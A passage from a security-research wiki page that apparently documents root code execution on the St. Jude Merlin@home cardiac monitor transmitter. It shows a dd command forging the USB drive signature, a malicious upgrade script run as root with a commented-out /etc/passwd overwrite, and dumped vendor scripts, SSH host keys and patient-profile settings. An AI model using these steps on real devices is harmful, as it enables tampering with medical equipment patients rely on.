feedback "Mounting $scsi_dev"1" on $mountpt"<br />
mount -t auto $scsi_dev"1" $mountpt<br />
if [ "$?" -eq 0 ]; then<br />
feedback "$scsi_dev"1" is now mounted on $mountpt"<br />
feedback "Launch application specific script" <br />
sh /etc/launch_appln.sh $mountpt<br />
else<br />
feedback "Mount error for $scsi_dev"<br />
fi<br />
else<br />
feedback "Ignoring $scsi_dev - already mounted"<br />
fi<br />
}<br />
<br />
# Find and mount all attached USB storage devices<br />
function mount_all_attached {<br />
local scsiuniqid=""<br />
feedback "Find and mount all attached usb storage devices"<br />
<br />
for scsiuniqid in $(allusb_scsiuniqid)<br />
do<br />
local scsidev="`diskdev_from_uniqid $scsiuniqid`"<br />
if [ "$scsidev" == "UNKNOWN" ]; then<br />
sleep 1<br />
fi<br />
mount_scsi_dev $scsidev<br />
done<br />
}<br />
<br />
***snip***<br />
<br />
<br />
# The remover script will be invoked when the device is removed. This is<br />
# useless in a way because umount will have no effect. The only benefit is<br />
# that the "mount" command will not show stale entries.<br />
<br />
# FIXME - Need to add specialized LOGIC to selectively umount USB flash drive <br />
# which is removed ( unlike umounting all attached USB flash drives )<br />
feedback "REM = $REMOVER"<br />
if [ -f $REMOVER ]; then<br />
echo '/bin/umount /mnt/sjmpendrives/*' >> $REMOVER<br />
else<br />
echo -e '#!/bin/sh\n/bin/umount /mnt/sjmpendrives/*' > $REMOVER<br />
fi<br />
<br />
# Inform the Export data script when pendrive is unplugged.<br />
echo -e '\nps -A | grep export_data \nif [ $? -eq 0 ]; then \n\tif [ -p /tmp/usbDataExport.pipe ]; then \n\t\t echo "Hotplug umount" > /tmp/usbDataExport.pipe \n\tfi\nfi' >> $REMOVER<br />
chmod a+x $REMOVER<br />
<br />
mount_all_attached</pre><br />
<br />
Lets look inside of /etc/launch_appln.sh<br />
<br />
<pre>#!/bin/sh<br />
<br />
if [ $# -ne 1 ]; then<br />
echo "usage: ./launch_appln.sh /mnt/pendrive"<br />
exit<br />
fi<br />
<br />
# FIXME <br />
# This script may be invoked by hotplug <br />
# Do not run the script if it is already running <br />
# updater or data export<br />
<br />
mountpt=$1<br />
script_path=/apps/tanto/<br />
<br />
if [ -f $mountpt/version.ini ]; then<br />
# call updater script<br />
echo "Launching updater script"<br />
if [ -f $mountpt/etc/init.d/upgrade_script.sh ]; then<br />
sh $mountpt/etc/init.d/upgrade_script.sh $mountpt > /tmp/debugUpdater.txt 2>&1<br />
umount /mnt/sjmpendrives/1<br />
umount /mnt/pendrive<br />
else<br />
umount /mnt/sjmpendrives/1<br />
umount /mnt/pendrive<br />
exit 0<br />
fi<br />
else<br />
# Call Data export script<br />
echo "Launching export data script"<br />
sh $script_path/export_data.sh $mountpt<br />
umount /mnt/sjmpendrives/1<br />
umount /mnt/pendrive<br />
fi</pre><br />
<br />
It looks like their pendrive "signature" is fairly easy to get around.<br />
<br />
<pre>rjmendez@Reggie:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501<br />
3+0 records in<br />
3+0 records out<br />
3 bytes copied, 0.00116472 s, 2.6 kB/s<br />
rjmendez@Reggie:~/stjude_merlin$ hd /tmp/.sign <br />
00000000 00 00 00 |...|<br />
00000003<br />
rjmendez@Reggie:~/stjude_merlin$ hd .sign_mod<br />
00000000 53 4a 4d |SJM|<br />
00000003<br />
rjmendez@Reggie:~/stjude_merlin$ sudo dd if=.sign_mod bs=1 count=3 of=/dev/sdb1 bs=1 seek=501<br />
3+0 records in<br />
3+0 records out<br />
3 bytes copied, 0.00700994 s, 0.4 kB/s<br />
rjmendez@Reggie:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501<br />
3+0 records in<br />
3+0 records out<br />
3 bytes copied, 0.00123249 s, 2.4 kB/s<br />
rjmendez@Reggie:~/stjude_merlin$ hd /tmp/.sign <br />
00000000 53 4a 4d |SJM|<br />
00000003</pre><br />
<br />
Adding the required files to the drive and a small script.<br />
<br />
<pre>rjmendez@Reggie:/media/rjmendez/7A3B-B3C6$ ls -lahR<br />
.:<br />
total 36K<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 14 11:04 .<br />
drwxr-x---+ 8 root root 4.0K May 14 11:02 ..<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 etc<br />
-rw-r--r-- 1 rjmendez rjmendez 620 May 14 06:01 passwd<br />
-rw-r--r-- 1 rjmendez rjmendez 4 May 10 17:07 version.ini<br />
<br />
./etc:<br />
total 24K<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 .<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 14 11:04 ..<br />
drwxr-xr-x 2 rjmendez rjmendez 8.0K May 13 14:02 init.d<br />
<br />
./etc/init.d:<br />
total 24K<br />
drwxr-xr-x 2 rjmendez rjmendez 8.0K May 13 14:02 .<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 ..<br />
-rw-r--r-- 1 rjmendez rjmendez 771 May 13 18:27 upgrade_script.sh<br />
<br />
rjmendez@Reggie:/media/rjmendez/7A3B-B3C6$ cat etc/init.d/upgrade_script.sh <br />
#!/bin/sh<br />
function led_off {<br />
for i in `seq 0 7`;<br />
do<br />
ledControl -l$i -b0<br />
sleep 0.05<br />
done<br />
}<br />
<br />
function led_dim {<br />
for i in `seq 0 7`;<br />
do<br />
ledControl -l$i -b1<br />
sleep 0.05<br />
done<br />
}<br />
<br />
function led_bright {<br />
for i in `seq 0 7`;<br />
do<br />
ledControl -l$i -b2<br />
sleep 0.05<br />
done<br />
}<br />
<br />
function party_mode {<br />
counter=0<br />
while [ $counter -lt $1 ];<br />
do<br />
led_off<br />
sleep 0.05<br />
led_dim<br />
sleep 0.05<br />
led_bright<br />
sleep 0.05<br />
let counter=counter+1<br />
done<br />
}<br />
<br />
/etc/init.d/tantoapp stop<br />
#cp /mnt/sjmpendrives/1/passwd /etc/passwd<br />
echo "This worked!" > /root/diditwork.txt<br />
if [ -f /root/diditwork.txt ];<br />
then<br />
party_mode 15<br />
else<br />
echo "It did not work..."<br />
fi</pre><br />
<br />
This is the output that we get from the console.<br />
<br />
<pre>operator@(none):~$ su root<br />
Password: <br />
PAM_unix[265]: (su) session opened for user root by (uid=12)<br />
root@(none):~# hub.c: new USB device usb-mx2hci-2, assigned address 2<br />
scsi0 : SCSI emulation for USB Mass Storage devices<br />
Vendor: Lexar Model: USB Flash Drive Rev: 1100<br />
Type: Direct-Access ANSI SCSI revision: 02<br />
Attached scsi removable disk sda at scsi0, channel 0, id 0, lun 0<br />
SCSI device sda: 31285248 512-byte hdwr sectors (16018 MB)<br />
sda: Write Protect is off<br />
Partition check:<br />
/dev/scsi/host0/bus0/target0/lun0: p1<br />
modprobe: Can't locate module /dev/sg1<br />
modprobe: Can't locate module /dev/sg2<br />
modprobe: Can't locate module /dev/sg3<br />
modprobe: Can't locate module /dev/sg4<br />
modprobe: Can't locate module /dev/sg5<br />
modprobe: Can't locate module /dev/sdb<br />
modprobe: Can't locate module /dev/sdc<br />
modprobe: Can't locate module /dev/sdd<br />
modprobe: Can't locate module /dev/sde<br />
modprobe: Can't locate module /dev/sdf<br />
modprobe: modprobe: Can't locate module nls_cp437<br />
modprobe: modprobe: Can't locate module nls_iso8859-1<br />
modprobe: modprobe: Can't locate module nls_iso8859-1<br />
modprobe: modprobe: Can't locate module nls_iso8859-1<br />
ls /root<br />
devel_install.sh diditwork.txt setdev.sh setlog.sh<br />
root@(none):~# cat /root/diditwork.txt <br />
This worked!<br />
root@(none):~# cat /tmp/usbstorage.log <br />
+++ Starting USB (un)mounter script for device /proc/bus/usb/001/002<br />
REM = /var/run/usb/%proc%bus%usb%001%002<br />
Find and mount all attached usb storage devices<br />
usb proc-fs yields SCSI host number=0 - suffix with zeroes (kernel 2.4)<br />
Use sgmap to match 0:0:0:0.<br />
Waiting for device id to appear...<br />
SCSI disk for 0:0:0:0 is /dev/sda<br />
Checking /mnt/sjmpendrives/1<br />
Mountpoint /mnt/sjmpendrives/1 is free<br />
Checking signature ... <br />
node1 = /dev/sda1<br />
Valid pendrive<br />
Valid pendrive<br />
Mounting /dev/sda1 on /mnt/sjmpendrives/1<br />
/dev/sda1 is now mounted on /mnt/sjmpendrives/1<br />
Launch application specific script</pre><br />
<br />
== Party Mode Demo ==<br />
{{#ev:youtube|cNcGebu8NRs}}<br />
<br />
== Other Stuff to Look Into ==<br />
<br />
I doubt this device has been updated to the latest firmware as I aquired it still wrapped in its packaging. As of January 2017 St. Jude Medical claims that a security patch has been applied to the newer firmware releases.<br />
<br />
Below are some interesting things that were found.<br />
<br />
DSA keys and known hosts.<br />
<pre>root@(none):~# cd /root/.ssh<br />
root@(none):~/.ssh# ls -lah<br />
drwx------ 2 root root 0 Jan 10 2013 .<br />
drwxrwxr-x 3 root root 0 May 15 00:10 ..<br />
-rw------- 1 root root 668 Nov 28 2012 id_dsa<br />
-rw-r--r-- 1 root root 601 Nov 28 2012 id_dsa.pub<br />
-rw-r--r-- 1 root root 719 Nov 28 2012 known_hosts<br />
root@(none):~/.ssh# cat known_hosts <br />
REDACTED.merlin.net,150.202.X.X ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtfdoYdn5D/vsC4Pm25jBUXDzfXrj6O50O32UONPOnvKcb08acULYcx1bDyeRGcMBqKwEJdPUKdwAT2evf4jYVSa4JvDAHQWJo15s2igWO04veEYitV5i0NEqVs+vRTJAqM70iCIKkhtoGkjBBnJcntw6u/8vgKXkvqBx85WBULc=<br />
REDACTED.merlin.net,150.202.X.X ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA29HEmKtQ5RABmAWmZ3MdyO+wiQ1GGzuNneGnPPL8KF+SYLjHXaQViB32cibA9dSauMpb8zcwj7YSxtKfu4K1gcH5vUOsqW9BgDsZYv7zWk2OHb8vLs+NT083+YbzjZvr7oGz+1/TAzfXORsN9Gf+BQMsHyjiHOjVJ/vEIy2fp0E=<br />
REDACTED.merlin.net,150.202.X.X ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAyDjGfUubwy0y0KJw459g2L17DK4K4QAIZSvcW8hupVNK/3IrP9HSXetS69czyLISFfewq6a4ippvsbh5i+fb2C2vhHmW4N1U3zKa6vcKzUEd6j6NwUefunbSP8XBXaMoqSuN2l3nbfEeUIaVDuSk9m6uP/rVcGVQHZokPVDdpP8=</pre><br />
<br />
Dev scripts in /root/<br />
<pre>root@(none):~# ls -lah /root<br />
drwxrwxr-x 3 root root 0 May 15 00:10 .<br />
drwxr-xr-x 20 root root 0 Jan 1 1970 ..<br />
-rw-r--r-- 1 root root 446 Jan 1 1970 .bash_history<br />
-rw-r--r-- 1 root root 52 Apr 24 2008 .bash_profile<br />
drwx------ 2 root root 0 Jan 10 2013 .ssh<br />
-r-xr-xr-x 1 root root 3.0k Nov 28 2012 devel_install.sh<br />
-r-xr-xr-x 1 root root 483 Nov 28 2012 setdev.sh<br />
-r-xr-xr-x 1 root root 267 Nov 28 2012 setlog.sh<br />
<br />
root@(none):~# cat setdev.sh <br />
#!/bin/sh<br />
<br />
if [ $# -ne 1 ]; then<br />
echo "usage: ./setdev.sh [1|0]"<br />
exit<br />
fi<br />
<br />
if [ $1 -eq 1 ]; then<br />
sed '1,$s/DEVELOPMENT \(.*= .*\)0/DEVELOPMENT \11/g' /data/config/TantoParms.conf > /tmp/TantoParms.conf<br />
cp -f /tmp/TantoParms.conf /data/config/TantoParms.conf<br />
elif [ $1 -eq 0 ]; then<br />
sed '1,$s/DEVELOPMENT \(.*= .*\)1/DEVELOPMENT \10/g' /data/config/TantoParms.conf > /tmp/TantoParms.conf<br />
cp -f /tmp/TantoParms.conf /data/config/TantoParms.conf<br />
else<br />
echo "Invalid argument"<br />
fi<br />
<br />
root@(none):~# cat setlog.sh <br />
#!/bin/sh<br />
<br />
if [ $# -ne 1 ]; then<br />
echo "usage: ./setlog.sh [1|0]"<br />
exit<br />
fi<br />
<br />
if [ $1 -eq 1 ]; then<br />
touch /data/config/.tantolog<br />
touch /data/config/.dcllog<br />
elif [ $1 -eq 0 ]; then<br />
rm /data/config/.tantolog<br />
rm /data/config/.dcllog<br />
else<br />
echo "Invalid argument"<br />
fi<br />
<br />
root@(none):~# cat devel_install.sh<br />
#!/bin/sh<br />
#<br />
# Script to download the devel package via scp from ftp.pacesetter.com<br />
# Username: REDACTED_USER. The script will prompt for a password which the <br />
# user has to enter. <br />
# <br />
# Version 0.1 - Ashok Iyer (aiyer at sjm dot com)<br />
<br />
# Setup the PATH. Don't assume we get a sane one<br />
export PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin<br />
<br />
# IP address of the server from which we download the devel package using scp.<br />
SERVER="10.16.155.27"<br />
<br />
function download_package()<br />
{<br />
# Download the devel package and the md5sum.txt file<br />
echo -e "\n==> Downloading $1 package using wget.\n"<br />
<br />
wget ftp://REDACTED_USER:REDACTED_PASSWORD@10.16.155.27/$2/$1<br />
<br />
if [ "$?" != 0 ]; then<br />
echo "scp failed..."<br />
exit 1<br />
fi<br />
}<br />
<br />
/root/setdev.sh 1<br />
/etc/init.d/tantoapp stop<br />
<br />
if [ ! -f /etc/password_key ]; then<br />
touch /etc/password_key<br />
fi<br />
<br />
echo "-----------------------------------------------------"<br />
echo "This script will install the development package" <br />
echo "This contains the following:"<br />
<br />
echo " 1. gdbserver"<br />
echo " 2. ssh server"<br />
echo " 3. procps (contains vmstat and top)"<br />
echo " 4. dos2unix and unix2dos"<br />
echo " 5. ftp client"<br />
echo " 6. mtd utilities (for diagnostics)"<br />
echo " 7. less utility"<br />
echo " 8. traceroute"<br />
echo " 9. agentd"<br />
echo " 10. monitord"<br />
echo "-----------------------------------------------------"<br />
<br />
sleep 2<br />
<br />
# Test if the server is reachable<br />
echo <br />
echo "---- Testing server connectivity ----"<br />
sleep 2<br />
ping -c 3 -w 10 $SERVER<br />
<br />
if [ "$?" != 0 ]; then<br />
echo <br />
echo "--- $SERVER not reachable. ---"<br />
echo " Will try connecting anyway (some firewalls block ping requests)".<br />
echo " Contact your network administrator if the connection fails"<br />
sleep 2<br />
else<br />
echo <br />
echo "--- Server reachable. Good! ---"<br />
echo<br />
fi<br />
<br />
TMPDIR="$HOME/devel$$"<br />
mkdir $TMPDIR<br />
<br />
if [ "$?" != 0 ]; then<br />
echo "unable to create temporary directory. Check if you have write"<br />
echo "permissions in $HOME"<br />
fi<br />
<br />
cd $TMPDIR<br />
# Download the development packages<br />
echo<br />
echo "+----------------------------------------------+"<br />
echo "| Downloading development packages using wget. |"<br />
echo "+----------------------------------------------+"<br />
echo<br />
<br />
download_package "devel-util_1.4_all.ipk" "not-so-advanced/utils/devel_packages/"<br />
<br />
echo<br />
echo "+---------------------------------------+"<br />
echo "| Installing the development utilities. |"<br />
echo "+---------------------------------------+"<br />
echo<br />
# The package is sane. Install it<br />
ipkg-cl -d root install *.ipk<br />
<br />
if [ "$?" != 0 ]; then<br />
echo "Package installation failed"<br />
exit 1<br />
fi<br />
<br />
echo<br />
echo "+-------------------------------------------+"<br />
echo "| Performing required config modifications. |"<br />
echo "+-------------------------------------------+"<br />
echo<br />
<br />
sed '1,$s/AUTOKEYGEN=no/AUTOKEYGEN=yes/g' /etc/default/ssh > /tmp/ssh<br />
cp -a /tmp/ssh /etc/default/ssh<br />
<br />
echo<br />
echo "+-------------------------------------------+"<br />
echo "| Starting SSH Daemon . |"<br />
echo "+-------------------------------------------+"<br />
echo<br />
<br />
/etc/init.d/ssh start<br />
<br />
echo<br />
echo "Devel package successfully installed"<br />
<br />
cd $HOME<br />
<br />
# delete TMPDIR<br />
rm -rf $TMPDIR<br />
<br />
exit 0</pre><br />
<br />
Sample patient profile<br />
<pre><?xml version="1.0" encoding="UTF-8"?><br />
<profile:ProfileList xmlns:profile="http://www.merlin.net/PayloadProfile.xsd"><br />
<SystemData><br />
<SystemInformation DeviceModel="XXXX-XX" DeviceSerialNumber="XXXXXX" NumberOfProfiles="7" PatientNotifyWindowEnd="23:00:00" PatientNotifyWindowStart="16:00:00" ProfileDate="2011-09-07" ProfileVersion="7" SchemaVersion="A" TransmitterModelNumber="EX1150" TransmitterProfileID="100899" TransmitterRequestType="PProfile" TransmitterSerialNumber="00000000" UTCServerTime="22:57:29"/><br />
<Controls><br />
<Switch name="ADETECT_DIALUP_NUM" value="Enable"/><br />
<Switch name="UNPAIRED_MODE" value="Disable"/><br />
<Switch name="ENROLLMENT_CHANGE" value="Disable"/><br />
<Switch name="PROFILE_SYNC_PREF" value="Enable"/><br />
<iSwitch name="ALLWD_UNSCHED_EVENTS" value="100"/><br />
<iSwitch name="NOTIFY_DELAY_ALERT" value="24"/><br />
<iSwitch name="NOTIFY_DELAY_FLP" value="96"/><br />
<iSwitch name="NOTIFY_DELAY_MED" value="0"/><br />
<iSwitch name="NOTIFY_DELAY_SERVER" value="0"/><br />
<tSwitch name="CLINIC_TYPE" value="UNKNOWN"/><br />
<tSwitch name="SHORT_BTN_ACTION" value="FLP"/><br />
<tSwitch name="LONG_BTN_ACTION" value="DCHK"/><br />
<tSwitch name="MERLIN_ID" value="512556937"/><br />
<tSwitch name="UPDATED_DEVICE_MODEL" value="1111-11"/><br />
<tSwitch name="UPDATED_DEVICE_SERIAL" value="999999"/><br />
<tSwitch name="SCHED_REF_TIME" value="2001-01-01_00-00-00"/><br />
<tSwitch name="VOL_CTRL_PREF" value="OFF"/><br />
</Controls><br />
</SystemData><br />
<PayloadProfile Type="Follow-up"><br />
<GenerateSchedule GS_DateOfEvent="2011-09-08" GS_TimeOfEvent="09:00:00"/><br />
<Controls><br />
<Switch name="GDC2_SCHED_FLP_PREF" value="Enable"/><br />
<Switch name="UNSCHED_FLP_PREF" value="Enable"/><br />
<Switch name="SCHED_FLP_PREF" value="Disable"/><br />
<Switch name="CLEAR_EPIS_FLAG" value="Enable"/><br />
<Switch name="CLEAR_ST_FLAG" value="Disable"/><br />
<Switch name="CLEAR_DIAG_FLAG" value="Enable"/><br />
<Switch name="CLEAR_SEGM_FLAG" value="Enable"/><br />
</Controls><br />
</PayloadProfile><br />
<PayloadProfile Type="Device_Check"><br />
<GenerateSchedule GS_Interval="24" GS_TimeOfEvent="09:00:00"/><br />
<Controls><br />
<Switch name="UNSCH_DCHK_PREF" value="Enable"/><br />
<Switch name="SCHED_DCHK_PREF" value="Disable"/><br />
</Controls><br />
</PayloadProfile><br />
<PayloadProfile Type="Alert_Controls"><br />
<Controls><br />
<Switch name="HIGH_VRATE_EPISODE_ALERT" value="Disable"/><br />
<Switch name="V_AUTOCAP_ALERT" value="Disable"/><br />
<Switch name="ACAP_CONFIRM_ALERT" value="Disable"/><br />
<Switch name="RVCAP_CONFIRM_ALERT" value="Disable"/><br />
<Switch name="LVCAP_CONFIRM_ALERT" value="Disable"/><br />
<Switch name="HIGH_VRATE_EPISODE_NOT" value="Disable"/><br />
<Switch name="V_AUTOCAP_NOT" value="Disable"/><br />
<Switch name="ACAP_CONFIRM_NOT" value="Disable"/><br />
<Switch name="RVCAP_CONFIRM_NOT" value="Disable"/><br />
<Switch name="LVCAP_CONFIRM_NOT" value="Disable"/><br />
<Switch name="CONG_MON_ALERT" value="Enable"/><br />
<Switch name="DEV_IN_MRI_MODE_ALERT" value="Disable"/><br />
<Switch name="DEV_RST_MRI_MODE_ALERT" value="Disable"/><br />
<Switch name="EARLY_DEPLETION_DETECTED_ALERT" value="Enable"/><br />
<Switch name="PER_BIV_PACING_ALERT" value="Disable"/><br />
<Switch name="PER_RV_PACING_ALERT" value="Enable"/><br />
<Switch name="CONG_MON_NOT" value="Disable"/><br />
<Switch name="DEV_IN_MRI_MODE_NOT" value="Disable"/><br />
<Switch name="DEV_RST_MRI_MODE_NOT" value="Disable"/><br />
<Switch name="EARLY_DEPLETION_DETECTED_NOT" value="Disable"/><br />
<Switch name="PER_BIV_PACING_NOT" value="Disable"/><br />
<Switch name="PER_RV_PACING_NOT" value="Disable"/><br />
<Switch name="LFDA_TIMEOUT_ALERT" value="Enable"/><br />
<Switch name="ST_TYPE_2_ALERT" value="Enable"/><br />
<Switch name="VT_VF_3_PER_DAY_ALERT" value="Enable"/><br />
<Switch name="THERAPY_EXHAUSTED_ALERT" value="Enable"/><br />
<Switch name="HV_THERAPY_UNSUC_ALERT" value="Enable"/><br />
<Switch name="VT_VF_OCCURED_ALERT" value="Enable"/><br />
<Switch name="LFDA_TIMEOUT_NOT" value="Disable"/><br />
<Switch name="ST_TYPE_2_NOT" value="Disable"/><br />
<Switch name="VT_VF_3_PER_DAY_NOT" value="Disable"/><br />
<Switch name="THERAPY_EXHAUSTED_NOT" value="Disable"/><br />
<Switch name="HV_THERAPY_UNSUC_NOT" value="Disable"/><br />
<Switch name="VT_VF_OCCURED_NOT" value="Disable"/><br />
<Switch name="LFDA_NSLN_ALERT" value="Enable"/><br />
<Switch name="LFDA_RV_NOISE_ALERT" value="Enable"/><br />
<Switch name="ST_TYPE_1_ALERT" value="Enable"/><br />
<Switch name="LFDA_NSLN_NOT" value="Disable"/><br />
<Switch name="LFDA_RV_NOISE_NOT" value="Disable"/><br />
<Switch name="ST_TYPE_1_NOT" value="Enable"/><br />
<Switch name="AIMP_OOR_ALERT" value="Disable"/><br />
<Switch name="CCRG_LMT_ALERT" value="Enable"/><br />
<Switch name="DEV_EOS_ALERT" value="Disable"/><br />
<Switch name="DEV_ERI_ALERT" value="Enable"/><br />
<Switch name="DEV_EVVI_ALERT" value="Enable"/><br />
<Switch name="DEV_RST_ALERT" value="Enable"/><br />
<Switch name="HVIMP_OOR_ALERT" value="Enable"/><br />
<Switch name="HW_BVVI_ALERT" value="Enable"/><br />
<Switch name="LVIMP_OOR_ALERT" value="Disable"/><br />
<Switch name="OCD_ALERT" value="Enable"/><br />
<Switch name="SOSD_ALERT" value="Enable"/><br />
<Switch name="RVIMP_OOR_ALERT" value="Enable"/><br />
<Switch name="TTRPY_DIS_ALERT" value="Enable"/><br />
<Switch name="ATAF_DUR_ALERT" value="Disable"/><br />
<Switch name="ATAF_WK_DUR_ALERT" value="Disable"/><br />
<Switch name="ATAF_VRATE_ALERT" value="Disable"/><br />
<Switch name="ATP_RX_SUCCESS_ALERT" value="Enable"/><br />
<Switch name="HV_TRPY_ALERT" value="Enable"/><br />
<Switch name="PERCENT_BIV_THRESHOLD_ALERT" value="Disable"/><br />
<Switch name="PERCENT_RV_THRESHOLD_ALERT" value="Disable"/><br />
<Switch name="ST_MAJOR_EPISODE_ALERT" value="Disable"/><br />
<Switch name="TRPY_ACCEL_ALERT" value="Enable"/><br />
<Switch name="NOISE_REV_ALERT" value="Disable"/><br />
<Switch name="NSVT_EPIS_ALERT" value="Disable"/><br />
<Switch name="NSVF_EPIS_ALERT" value="Disable"/><br />
<Switch name="SPARE_1_ALERT" value="Disable"/><br />
<Switch name="SPARE_2_ALERT" value="Disable"/><br />
<Switch name="SPARE_3_ALERT" value="Disable"/><br />
<Switch name="SPARE_4_ALERT" value="Disable"/><br />
<Switch name="SPARE_5_ALERT" value="Disable"/><br />
<Switch name="AIMP_OOR_NOT" value="Disable"/><br />
<Switch name="CCRG_LMT_NOT" value="Disable"/><br />
<Switch name="DEV_EOS_NOT" value="Disable"/><br />
<Switch name="DEV_ERI_NOT" value="Disable"/><br />
<Switch name="DEV_EVVI_NOT" value="Disable"/><br />
<Switch name="DEV_RST_NOT" value="Disable"/><br />
<Switch name="HVIMP_OOR_NOT" value="Disable"/><br />
<Switch name="HW_BVVI_NOT" value="Disable"/><br />
<Switch name="LVIMP_OOR_NOT" value="Disable"/><br />
<Switch name="OCD_NOT" value="Disable"/><br />
<Switch name="SOSD_NOT" value="Disable"/><br />
<Switch name="RVIMP_OOR_NOT" value="Disable"/><br />
<Switch name="TTRPY_DIS_NOT" value="Disable"/><br />
<Switch name="ATAF_DUR_NOT" value="Disable"/><br />
<Switch name="ATAF_WK_DUR_NOT" value="Disable"/><br />
<Switch name="ATAF_VRATE_NOT" value="Disable"/><br />
<Switch name="ATP_RX_SUCCESS_NOT" value="Disable"/><br />
<Switch name="HV_TRPY_NOT" value="Disable"/><br />
<Switch name="PERCENT_BIV_THRESHOLD_NOT" value="Disable"/><br />
<Switch name="PERCENT_RV_THRESHOLD_NOT" value="Disable"/><br />
<Switch name="ST_MAJOR_EPISODE_NOT" value="Disable"/><br />
<Switch name="TRPY_ACCEL_NOT" value="Disable"/><br />
<Switch name="NOISE_REV_NOT" value="Disable"/><br />
<Switch name="NSVT_EPIS_NOT" value="Disable"/><br />
<Switch name="NSVF_EPIS_NOT" value="Disable"/><br />
<Switch name="SPARE_1_NOT" value="Disable"/><br />
<Switch name="SPARE_2_NOT" value="Disable"/><br />
<Switch name="SPARE_3_NOT" value="Disable"/><br />
<Switch name="SPARE_4_NOT" value="Disable"/><br />
<Switch name="SPARE_5_NOT" value="Disable"/><br />
<iSwitch name="BIV_PACING_DURATION" value="7"/><br />
<iSwitch name="RV_PACING_DURATION" value="7"/><br />
<iSwitch name="ALERT_MASK_DURATION" value="4000"/><br />
<iSwitch name="PERCENT_BIV_PACING" value="100"/><br />
<iSwitch name="PERCENT_RV_PACING" value="100"/><br />
<br />
</Controls><br />
</PayloadProfile><br />
<PayloadProfile Type="GDC"><br />
<GenerateSchedule GS_Interval="1440"/><br />
<UploadSchedule US_Interval="168"/><br />
<Controls><br />
<Switch name="SCHED_GDC_PREF" value="Disable"/><br />
<Switch name="CLEAR_GDC_FLAG" value="Enable"/><br />
</Controls><br />
</PayloadProfile><br />
<PayloadProfile Type="Maintenance"><br />
<UploadSchedule US_Interval="168"/><br />
<Controls><br />
<Switch name="MAINT_REBOOT_PREF" value="Disable"/><br />
<Switch name="MAINT_PREF" value="Enable"/><br />
<Switch name="RF_STAT_COLLECT" value="Disable"/><br />
<Switch name="STAT_DATA_UPLD_PREF" value="Enable"/><br />
</Controls><br />
</PayloadProfile><br />
<PayloadProfile Type="MED"><br />
<GenerateSchedule GS_Interval="24"/><br />
<UploadSchedule US_Interval="7"/><br />
<Controls><br />
<Switch name="SCHED_MED_PREF" value="Enable"/><br />
<Switch name="SCHED_MED_WINDOW_PREF" value="Enable"/><br />
<iSwitch name="ACTIVE_MED_SCHEDULES" value="1"/><br />
<tSwitch name="MED_SCHEDULE_1" value="1100"/><br />
<tSwitch name="MED_SCHEDULE_2" value="0500"/><br />
</Controls><br />
</PayloadProfile><br />
<PayloadProfile Type="Spare"><br />
<GenerateSchedule GS_DateOfEvent="2000-01-01" GS_Interval="0" GS_TimeOfEvent="08:00:00" GS_UnscheduledEvent="Disable" GS_WeeklyEvent="Sunday"/><br />
<UploadSchedule US_DateOfEvent="2000-01-01" US_Interval="0" US_TimeOfEvent="08:00:00" US_UnscheduledEvent="Disable" US_WeeklyEvent="Sunday"/><br />
<Controls><br />
<Switch name="SPARE_FLAG1" value="Disable"/><br />
<Switch name="SPARE_FLAG2" value="Enable"/><br />
<Switch name="SPARE_FLAG3" value="Disable"/><br />
<Switch name="SPARE_FLAG4" value="Disable"/><br />
<Switch name="SPARE_FLAG5" value="Disable"/><br />
<Switch name="SPARE_FLAG6" value="Disable"/><br />
<Switch name="SPARE_FLAG7" value="Disable"/><br />
<Switch name="SPARE_FLAG8" value="Disable"/><br />
<Switch name="SPARE_FLAG9" value="Disable"/><br />
<Switch name="SPARE_FLAG10" value="Disable"/><br />
<iSwitch name="SPARE_INTEGER1" value="0"/><br />
<iSwitch name="SPARE_INTEGER2" value="0"/><br />
<iSwitch name="SPARE_INTEGER3" value="0"/><br />
<iSwitch name="SPARE_INTEGER4" value="0"/><br />
<iSwitch name="SPARE_INTEGER5" value="0"/><br />
<iSwitch name="SPARE_INTEGER6" value="0"/><br />
<iSwitch name="SPARE_INTEGER7" value="0"/><br />
<iSwitch name="SPARE_INTEGER8" value="0"/><br />
<iSwitch name="SPARE_INTEGER9" value="0"/><br />
<iSwitch name="SPARE_INTEGER10" value="0"/><br />
<rSwitch name="SPARE_REAL4" value="0.0"/><br />
<rSwitch name="SPARE_REAL5" value="0.0"/><br />
<rSwitch name="SPARE_REAL6" value="0.0"/><br />
<rSwitch name="SPARE_REAL7" value="0.0"/><br />
<rSwitch name="SPARE_REAL8" value="0.0"/><br />
<rSwitch name="SPARE_REAL9" value="0.0"/><br />
<rSwitch name="SPARE_REAL10" value="0.0"/><br />
<rSwitch name="SPARE_REAL1" value="0.0"/><br />
<rSwitch name="SPARE_REAL2" value="0.0"/><br />
<rSwitch name="SPARE_REAL3" value="0.0"/><br />
<tSwitch name="SPARE_TEXT1" value=" "/><br />
<tSwitch name="SPARE_TEXT2" value=" "/><br />
<tSwitch name="SPARE_TEXT3" value=" "/><br />
<tSwitch name="SPARE_TEXT4" value=" "/><br />
<tSwitch name="SPARE_TEXT5" value=" "/><br />
<tSwitch name="SPARE_TEXT6" value=" "/><br />
<tSwitch name="SPARE_TEXT7" value=" "/><br />
<tSwitch name="SPARE_TEXT8" value=" "/><br />
<tSwitch name="SPARE_TEXT9" value=" "/><br />
<tSwitch name="SPARE_TEXT10" value=" "/><br />
</Controls><br />
</PayloadProfile><br />
</profile:ProfileList></pre></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=SJM_Merlin_at_Home&diff=2701SJM Merlin at Home2017-05-14T19:20:57Z<p>Rjmendez: SJM Merlin@home model EX1150</p>
<hr />
<div>__FORCETOC__<br />
{{Disclaimer}}<br />
[[File:Merlin-at-home-1.jpg|100px|left|thumb]]<br />
[[Category:Medical]]<br />
This page will be dedicated to a general overview, descriptions, and information related to the St. Jude Medical Merlin@home Transmitter Model EX1150.<br />
<br />
== About ==<br />
